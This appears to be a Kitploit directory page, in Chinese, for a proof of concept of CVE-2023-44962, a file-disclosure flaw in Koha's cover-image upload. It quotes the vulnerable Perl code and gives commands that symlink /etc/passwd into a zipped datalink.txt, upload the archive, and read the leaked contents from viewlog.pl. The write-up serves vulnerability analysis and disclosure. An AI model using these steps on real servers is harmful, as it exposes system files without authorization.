Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Links.a — CVE-2023-44962 的 PoC | Kitploit
工具/GitHubGitHub/ladydarwe/links.a
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露错误配置
GitHubladydarwe/links.a

Links.a

CVE-2023-44962 的 PoC

查看仓库
12年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-44962

CVE-2023-44962 的 PoC

分析

在 upload-cover-image.pl 中上传包含符号链接的归档文件可能会泄露链接文件的部分内容。

root@kitploit:~
...
foreach my $dir (@directories) {
  my $file;
  if ( -e "$dir/idlink.txt" ) {
      $file = "$dir/idlink.txt";
  }
  elsif ( -e "$dir/datalink.txt" ) {
      $file = "$dir/datalink.txt";
  }
  else {
      next;
  }
  if ( open( my $fh, '<', $file ) ) {
      while ( my $line = <$fh> ) {
          my $delim =
              ( $line =~ /\t/ ) ? "\t"
            : ( $line =~ /,/ )  ? ","
            :                     "";

          unless ( $delim eq "," || $delim eq "\t" ) {
              warn
  "Unrecognized or missing field delimeter. Please verify that you are using either a ',' or a 'tab'";
              $error = 'DELERR';
          }
          else {
              ( $biblionumber, $filename ) = split $delim, $line, 2;
              $biblionumber =~
                s/[\"\r\n]//g;    # remove offensive characters
              $filename =~ s/[\"\r\n]//g;
              $filename =~ s/^\s+//;
              $filename =~ s/\s+$//;
              if (C4::Context->preference("CataloguingLog")) {
                  logaction('CATALOGUING', 'MODIFY', $biblionumber, "biblio cover image: $filename");
              }
...

从代码中可以看出,当解压出的文件包含 idlink. txt 或 datalink. txt 时,文件内容将被读取,并按照, 或 \t 进行分割。内容的后面部分将被赋值给 $filename,并且当启用 CataloguingLog 属性(默认启用)时,$filename 将被记录。

当访问 viewlog.pl 时,可以看到泄露的文件内容。

PoC

首先,创建一个归档文件:

root@kitploit:~
ln -s /etc/passwd datalink.txt
zip --symlinks datalink.zip datalink.txt

然后访问以下 URL 以上传 datalink.zip:

root@kitploit:~
http://koha_ip:intranet_port/cgi-bin/koha/tools/upload-cover-image.pl

响应代码为 500。

然后访问以下 URL 以读取文件内容:

root@kitploit:~
http://192.168.176.139:8081/cgi-bin/koha/tools/viewlog.pl
下载工具